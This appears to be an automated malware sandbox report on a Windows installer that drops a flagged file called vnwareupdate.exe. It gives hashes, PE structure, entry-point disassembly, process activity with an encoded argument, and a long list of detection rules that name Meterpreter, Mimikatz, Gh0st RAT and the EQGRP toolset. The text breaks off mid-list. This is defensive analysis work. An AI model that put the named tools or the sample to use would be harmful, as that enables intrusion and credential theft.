Preview:	# unsupported.tcl --.#.# Commands provided by Tk without official support. Use them at your.# own risk. They may change or go away without notice..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...# ----------------------------------------------------------------------.# Unsupported compatibility interface for folks accessing Tk's private.# commands and variable against recommended usage..# ----------------------------------------------------------------------..namespace eval ::tk::unsupported {.. # Map from the old global names of Tk private commands to their. # new namespace-encapsulated names... variable PrivateCommands . array set PrivateCommands {..tkButtonAutoInvoke..::tk::ButtonAutoInvoke..tkButtonDown...::tk::ButtonDown..tkButtonEnter...::tk::ButtonEnter..tkButtonInvoke...::tk::ButtonInvoke..tkButtonLeave...::tk::ButtonLeave..tkButtonUp...::tk::ButtonUp..tkCancelRepeat...::tk::Canc

C:\Users\user\Desktop\tk\xmfbox.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	25974
Entropy (8bit):	4.919711399379606
Encrypted:	false
SSDEEP:	384:obPApXi6V2+Bec3iGn7H6HZ1KDRxRcbQ3sd1GkjDo413lK/RIVOMXrSommjiETwZ:orAZTunc3sd1GkF3cIVUx01w
MD5:	1C9F8E939F67CAF0512A340D24783680
SHA1:	B6182C5FD9C4FA582AB23B3FF70D93265BD55F35
SHA-256:	42BA98733AE5CE3495D44199CDA5308064E1B46C898A55C6DFA24BE02B06BD81
SHA-512:	6D4D3536B436CFE3792FD0D912FCB21BBD80CCEE577302B1CFAB5029E765EEFD5A98674D5FBE798BC7750D2F9B8C4FD794C5F4D19E0A18CFADC2DFB6D0AC0890
Malicious:	false
Preview:	# xmfbox.tcl --.#.#.Implements the "Motif" style file selection dialog for the.#.Unix platform. This implementation is used only if the.#."::tk_strictMotif" flag is set..#.# Copyright (c) 1996 Sun Microsystems, Inc..# Copyright (c) 1998-2000 Scriptics Corporation.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...namespace eval ::tk::dialog {}.namespace eval ::tk::dialog::file {}...# ::tk::MotifFDialog --.#.#.Implements a file dialog similar to the standard Motif file.#.selection box..#.# Arguments:.#.type.."open" or "save".#.args..Options parsed by the procedure..#.# Results:.#.When -multiple is set to 0, this returns the absolute pathname.#.of the selected file. (NOTE: This is not the same as a single.#.element list.).# .#.When -multiple is set to > 0, this returns a Tcl list of absolute.# pathnames. The argument for -multiple is ignored, but for consistency.# with Windows it defines the ma

C:\Users\user\Desktop\vnwareupdate.exe Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	5.503075648263405
Encrypted:	false
SSDEEP:	192:LBmK5Y90VuzftHqs6ncRlmul1CeWJxTxnVsfxYi1T8s70wg:1Y6IvocREFjlnVKlAsoH
MD5:	FA8AFFACE280644885152DE7CD3234EE
SHA1:	46F80BC13FAB6DBA73601FA1728E442B2993AEA7
SHA-256:	88AE43B3E2F2905F3718238C27BC1F3E0906E68BC6CB3A3687243B0D52A51072
SHA-512:	4BD84A25B5E7F9ADCD57FEF98BD8C867B28EBE115FBEBBDAAA1C525B7930D232FD5B4F26FCA4CA1F99CB22E8C8E228828247CFD29EE0C3792B049E659B064DF1
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..K].,K].,K].,B%:,J].,B%+,I].,B%<,@].,K].,.].,B%,,]].,B%>,J].,RichK].,........................PE..L...^`5Z............................E........ ....@..........................P..............................................,"..x....@..............................................................`!..@............ ..8............................text............................... ..`.rdata..6.... ......................@..@.data........0......................@....rsrc........@.......$..............@..@................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.998820071583367
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	GZe6EcSTpO.exe
File size:	16770272
MD5:	87e0355c098d2dfd890ae4c9da26bbdd
SHA1:	5f300f4dd15cccbe51cd4df51ac30b7c2c84fc75
SHA256:	570c3c298c2d30bfd7d824b0ec8e28b3efa51bf269297348fc5fc30cb81a2d7e
SHA512:	48767a16b133dd434d7902c5785205807d55f85f977370414a279f3ee9088f07a256ccfdaf3a9d8ac7d60f11a9dd72008835bb95c4e98e42870b8a8c33486348
SSDEEP:	393216:OoAS/3t2zQuoUrh/dSRsY9+bpNIAQ4tpy0GMxn0UDIpFKHgBM:VD/dUQjD9jAQdMxM2HgBM
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L...)..\.................d...\|.....

File Icon


Icon Hash:	e0d08cf8d8ccc8e0

Static PE Info

General
Entrypoint:	0x40320c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5C157F29 [Sat Dec 15 22:24:41 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3abe302b6d9a1256e6a915429af4ffd2

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080A0h]
call dword ptr [0040809Ch]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042F40Ch], eax
je 00007F66B8AE8C63h
push ebx
call 00007F66B8AEBD3Ah
cmp eax, ebx
je 00007F66B8AE8C59h
push 00000C00h
call eax
mov esi, 00408298h
push esi
call 00007F66B8AEBCB6h
push esi
call dword ptr [00408098h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F66B8AE8C3Dh
push 0000000Ah
call 00007F66B8AEBD0Eh
push 00000008h
call 00007F66B8AEBD07h
push 00000006h
mov dword ptr [0042F404h], eax
call 00007F66B8AEBCFBh
cmp eax, ebx
je 00007F66B8AE8C61h
push 0000001Eh
call eax
test eax, eax
je 00007F66B8AE8C59h
or byte ptr [0042F40Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [00408288h]
mov dword ptr [0042F4D8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429830h
call dword ptr [00408178h]
push 0040A188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x853c	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x38000	0x3c40	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x628f	0x6400	False	0.6700390625	data	6.44220708071	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x135c	0x1400	False	0.4611328125	data	5.24004347634	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x25518	0x600	False	0.455078125	data	4.0493801016	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x30000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x38000	0x3c40	0x3e00	False	0.637978830645	data	6.04106553494	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x38250	0x10a8	data	English	United States
RT_ICON	0x392f8	0xea8	data	English	United States
RT_ICON	0x3a1a0	0x8a8	data	English	United States
RT_ICON	0x3aa48	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x3afb0	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x3b418	0x2e8	data	English	United States
RT_ICON	0x3b700	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x3b828	0x60	data	English	United States
RT_GROUP_ICON	0x3b888	0x68	data	English	United States
RT_MANIFEST	0x3b8f0	0x349	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: GZe6EcSTpO.exe PID: 5884 Parent PID: 5716

General

Start time:	13:46:03
Start date:	02/04/2021
Path:	C:\Users\user\Desktop\GZe6EcSTpO.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\GZe6EcSTpO.exe'
Imagebase:	0x400000
File size:	16770272 bytes
MD5 hash:	87E0355C098D2DFD890AE4C9DA26BBDD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: vnwareupdate.exe PID: 2540 Parent PID: 5884

General

Start time:	13:46:09
Start date:	02/04/2021
Path:	C:\Users\user\Desktop\vnwareupdate.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\vnwareupdate.exe' -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVDp1EkdsXXU0eMQcUpns8p6kdiZ4rFZD4y5oVgqOEZ9Po4Z4HgwiHmPwR8ajszuHS68AdaUj0pH0IEHv2mNV71t2soPIKLuE6vIlqTHadsqd5m4qTWlE5yUZYw6YMMgmll72lf1E232p9MVl4yhetYBzNx+sWPE+DpILBlSmddPucuORCpaLa5yzRa7ZbJ98jQfjCVZUbyNMn5Vxk30OIGoBOyrsN0VmKcdDsRZxUCHQhupf0BXrgN7wh46haut8zZzv6puQEmuGL/8u2wQFQEd9pNBJ0Rlv3QP/bjyE945wMYCc6Xz4QLd03mLiDwTqcCYAP/KGG8Yhr3pv/YbSaeW0WUI4zwTjoJArSp8wQL4F7Eb5XLV6Id8VVowmbmosktt/RQUrLvThJExvG5SvJP/mUR4/fnp2sNhMJrQ0VYv8PabCT5DFqxapVfyOG02/QYIIhU=
Imagebase:	0x400000
File size:	10752 bytes
MD5 hash:	FA8AFFACE280644885152DE7CD3234EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000003.00000002.522931627.000000000237B000.00000004.00000001.sdmp, Author: unknown Rule: scanarator, Description: Auto-generated rule on file scanarator.exe, Source: 00000003.00000002.522931627.000000000237B000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: Msfpayloads_msf, Description: Metasploit Payloads - file msf.sh, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_psh, Description: Metasploit Payloads - file msf-psh.vba, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_exe, Description: Metasploit Payloads - file msf-exe.vba, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_3, Description: Metasploit Payloads - file msf.psh, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_4, Description: Metasploit Payloads - file msf.aspx, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_cmd, Description: Metasploit Payloads - file msf-cmd.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_Meterpreter_inMemory, Description: Detects Meterpreter in-memory, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: netbiosX, Florian Roth Rule: PowerShell_ISESteroids_Obfuscation, Description: Detects PowerShell ISESteroids obfuscation, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Payload_Exe2Hex, Description: Detects payload generated by exe2hex, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Codoso_CustomTCP_4, Description: Detects Codoso APT CustomTCP Malware, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Codoso_PGV_PVID_1, Description: Detects Codoso APT PGV PVID Malware, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: GhostDragon_Gh0stRAT, Description: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: GhostDragon_Gh0stRAT_Sample2, Description: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoreImpact_sysdll_exe, Description: Detects a malware sysdll.exe from the Rocket Kitten APT, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Reflective_DLL_Loader_Aug17_1, Description: Detects Reflective DLL Loader, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Reflective_DLL_Loader_Aug17_2, Description: Detects Reflective DLL Loader - suspicious - Possible FP could be program crack, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Reflective_DLL_Loader_Aug17_3, Description: Detects Reflective DLL Loader, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WoolenGoldfish_Sample_1, Description: Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WoolenGoldfish_Generic_3, Description: Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: QuarksPwDump_Gen, Description: Detects all QuarksPWDump versions, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_create_dns_injection, Description: EQGRP Toolset Firewall - file create_dns_injection.py, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_screamingplow, Description: EQGRP Toolset Firewall - file screamingplow.sh, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_MixText, Description: EQGRP Toolset Firewall - file MixText.py, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_tunnel_state_reader, Description: EQGRP Toolset Firewall - file tunnel_state_reader, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_payload, Description: EQGRP Toolset Firewall - file payload.py, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_eligiblecandidate, Description: EQGRP Toolset Firewall - file eligiblecandidate.py, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_BUSURPER_2211_724, Description: EQGRP Toolset Firewall - file BUSURPER-2211-724.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_networkProfiler_orderScans, Description: EQGRP Toolset Firewall - file networkProfiler_orderScans.sh, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_epicbanana_2_1_0_1, Description: EQGRP Toolset Firewall - file epicbanana_2.1.0.1.py, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_sniffer_xml2pcap, Description: EQGRP Toolset Firewall - file sniffer_xml2pcap, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_BananaAid, Description: EQGRP Toolset Firewall - file BananaAid, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_config_jp1_UA, Description: EQGRP Toolset Firewall - file config_jp1_UA.pl, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_userscript, Description: EQGRP Toolset Firewall - file userscript.FW, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_BUSURPER_3001_724, Description: EQGRP Toolset Firewall - file BUSURPER-3001-724.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_workit, Description: EQGRP Toolset Firewall - file workit.py, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_tinyhttp_setup, Description: EQGRP Toolset Firewall - file tinyhttp_setup.sh, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_EPBA, Description: EQGRP Toolset Firewall - file EPBA.script, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_jetplow_SH, Description: EQGRP Toolset Firewall - file jetplow.sh, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_extrabacon, Description: EQGRP Toolset Firewall - file extrabacon_1.1.0.1.py, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_sploit_py, Description: EQGRP Toolset Firewall - file sploit.py, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_uninstallPBD, Description: EQGRP Toolset Firewall - file uninstallPBD.bat, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_BICECREAM, Description: EQGRP Toolset Firewall - file BICECREAM-2140, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_BFLEA_2201, Description: EQGRP Toolset Firewall - file BFLEA-2201.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_StoreFc, Description: EQGRP Toolset Firewall - file StoreFc.py, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_BBALL, Description: EQGRP Toolset Firewall - file BBALL_E28F6-2201.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_BARPUNCH_BPICKER, Description: EQGRP Toolset Firewall - from files BARPUNCH-3110, BPICKER-3100, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_Implants_Gen5, Description: EQGRP Toolset Firewall, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_pandarock, Description: EQGRP Toolset Firewall - from files pandarock_v1.11.1.1.bin, pit, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_BananaUsurper_writeJetPlow, Description: EQGRP Toolset Firewall - from files BananaUsurper-2120, writeJetPlow-2130, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_Implants_Gen4, Description: EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_Implants_Gen3, Description: EQGRP Toolset Firewall, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_BLIAR_BLIQUER, Description: EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_sploit, Description: EQGRP Toolset Firewall - from files sploit.py, sploit.py, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_Implants_Gen2, Description: EQGRP Toolset Firewall, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_Implants_Gen1, Description: EQGRP Toolset Firewall, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_ssh_telnet_29, Description: EQGRP Toolset Firewall - from files ssh.py, telnet.py, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_callbacks, Description: EQGRP Toolset Firewall - Callback addresses, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_Extrabacon_Output, Description: EQGRP Toolset Firewall - Extrabacon exploit output, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EQGRP_Unique_Strings, Description: EQGRP Toolset Firewall - Unique strings, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: kerberoast_PY, Description: Auto-generated rule - file kerberoast.py, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: p0wnedPowerCat, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPowerCat.cs, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: p0wnedPotato, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPotato.cs, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: p0wnedExploits, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedExploits.cs, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: p0wnedBinaries, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedBinaries.cs, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: p0wnedAmsiBypass, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedAmsiBypass.cs, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: p0wnedShell_outputs, Description: p0wnedShell Runspace Post Exploitation Toolkit - from files p0wnedShell.cs, p0wnedShell.cs, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: PlugX_J16_Gen2, Description: Detects PlugX Malware Samples from June 2016, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Venom_Rootkit, Description: Venom Linux Rootkit, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: ps1_toolkit_Invoke_Shellcode, Description: Auto-generated rule - file Invoke-Shellcode.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: ps1_toolkit_Invoke_Mimikatz, Description: Auto-generated rule - file Invoke-Mimikatz.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: ps1_toolkit_Invoke_RelfectivePEInjection, Description: Auto-generated rule - file Invoke-RelfectivePEInjection.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: ps1_toolkit_Persistence, Description: Auto-generated rule - file Persistence.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: ps1_toolkit_Invoke_Mimikatz_RelfectivePEInjection, Description: Auto-generated rule - from files Invoke-Mimikatz.ps1, 